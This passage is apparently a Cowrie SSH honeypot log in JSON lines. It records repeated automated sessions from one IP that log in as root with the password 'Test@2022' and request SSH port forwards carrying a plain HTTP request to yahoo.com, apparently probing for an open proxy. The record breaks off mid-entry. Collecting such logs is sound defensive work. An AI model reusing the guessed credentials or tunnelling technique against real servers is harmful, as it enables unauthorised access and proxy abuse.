{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30654,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bceeaf13fa9","protocol":"ssh","message":"New connection: 213.209.150.239:30654 (1.2.3.4:22) [session: 5bceeaf13fa9]","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.947201Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.949107Z","src_ip":"213.209.150.239","session":"5bceeaf13fa9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:17.996045Z","src_ip":"213.209.150.239","session":"5bceeaf13fa9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:18.230168Z","src_ip":"213.209.150.239","session":"5bceeaf13fa9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":15135,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:15135","sensor":"my-vps","timestamp":"2025-08-26T01:04:18.278143Z","session":"5bceeaf13fa9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:18.326013Z","src_ip":"213.209.150.239","session":"5bceeaf13fa9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":19491,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19491","sensor":"my-vps","timestamp":"2025-08-26T01:04:18.461502Z","session":"5bceeaf13fa9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:18.508751Z","src_ip":"213.209.150.239","session":"5bceeaf13fa9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:18.557326Z","src_ip":"213.209.150.239","session":"5bceeaf13fa9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30706,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c6b385e02ab","protocol":"ssh","message":"New connection: 213.209.150.239:30706 (1.2.3.4:22) [session: 4c6b385e02ab]","sensor":"my-vps","timestamp":"2025-08-26T01:04:18.603622Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:18.604263Z","src_ip":"213.209.150.239","session":"4c6b385e02ab"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:18.651516Z","src_ip":"213.209.150.239","session":"4c6b385e02ab"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:18.886150Z","src_ip":"213.209.150.239","session":"4c6b385e02ab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":19059,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:19059","sensor":"my-vps","timestamp":"2025-08-26T01:04:18.934367Z","session":"4c6b385e02ab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:18.981775Z","src_ip":"213.209.150.239","session":"4c6b385e02ab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":15955,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:15955","sensor":"my-vps","timestamp":"2025-08-26T01:04:19.117741Z","session":"4c6b385e02ab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:19.165406Z","src_ip":"213.209.150.239","session":"4c6b385e02ab"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:19.213502Z","src_ip":"213.209.150.239","session":"4c6b385e02ab"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30750,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca5798872a1d","protocol":"ssh","message":"New connection: 213.209.150.239:30750 (1.2.3.4:22) [session: ca5798872a1d]","sensor":"my-vps","timestamp":"2025-08-26T01:04:19.269117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:19.270074Z","src_ip":"213.209.150.239","session":"ca5798872a1d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:19.326679Z","src_ip":"213.209.150.239","session":"ca5798872a1d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:19.609023Z","src_ip":"213.209.150.239","session":"ca5798872a1d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":1383,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:1383","sensor":"my-vps","timestamp":"2025-08-26T01:04:19.667254Z","session":"ca5798872a1d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:19.723951Z","src_ip":"213.209.150.239","session":"ca5798872a1d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":14133,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14133","sensor":"my-vps","timestamp":"2025-08-26T01:04:19.878982Z","session":"ca5798872a1d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:19.935673Z","src_ip":"213.209.150.239","session":"ca5798872a1d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:19.993060Z","src_ip":"213.209.150.239","session":"ca5798872a1d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30792,"dst_ip":"1.2.3.4","dst_port":22,"session":"38e6ded601b7","protocol":"ssh","message":"New connection: 213.209.150.239:30792 (1.2.3.4:22) [session: 38e6ded601b7]","sensor":"my-vps","timestamp":"2025-08-26T01:04:20.039225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:20.039882Z","src_ip":"213.209.150.239","session":"38e6ded601b7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:20.087078Z","src_ip":"213.209.150.239","session":"38e6ded601b7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:20.322488Z","src_ip":"213.209.150.239","session":"38e6ded601b7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":31475,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:31475","sensor":"my-vps","timestamp":"2025-08-26T01:04:20.371004Z","session":"38e6ded601b7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:20.418350Z","src_ip":"213.209.150.239","session":"38e6ded601b7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":16535,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:16535","sensor":"my-vps","timestamp":"2025-08-26T01:04:20.553702Z","session":"38e6ded601b7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:20.601283Z","src_ip":"213.209.150.239","session":"38e6ded601b7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:20.649415Z","src_ip":"213.209.150.239","session":"38e6ded601b7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30843,"dst_ip":"1.2.3.4","dst_port":22,"session":"25059d517c9c","protocol":"ssh","message":"New connection: 213.209.150.239:30843 (1.2.3.4:22) [session: 25059d517c9c]","sensor":"my-vps","timestamp":"2025-08-26T01:04:20.705081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:20.706194Z","src_ip":"213.209.150.239","session":"25059d517c9c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:20.762575Z","src_ip":"213.209.150.239","session":"25059d517c9c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:21.044676Z","src_ip":"213.209.150.239","session":"25059d517c9c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":8059,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:8059","sensor":"my-vps","timestamp":"2025-08-26T01:04:21.102325Z","session":"25059d517c9c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:21.158984Z","src_ip":"213.209.150.239","session":"25059d517c9c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":28438,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28438","sensor":"my-vps","timestamp":"2025-08-26T01:04:21.315005Z","session":"25059d517c9c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:21.371577Z","src_ip":"213.209.150.239","session":"25059d517c9c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:21.429913Z","src_ip":"213.209.150.239","session":"25059d517c9c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30897,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1176d8ef994","protocol":"ssh","message":"New connection: 213.209.150.239:30897 (1.2.3.4:22) [session: e1176d8ef994]","sensor":"my-vps","timestamp":"2025-08-26T01:04:21.485336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:21.485993Z","src_ip":"213.209.150.239","session":"e1176d8ef994"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes2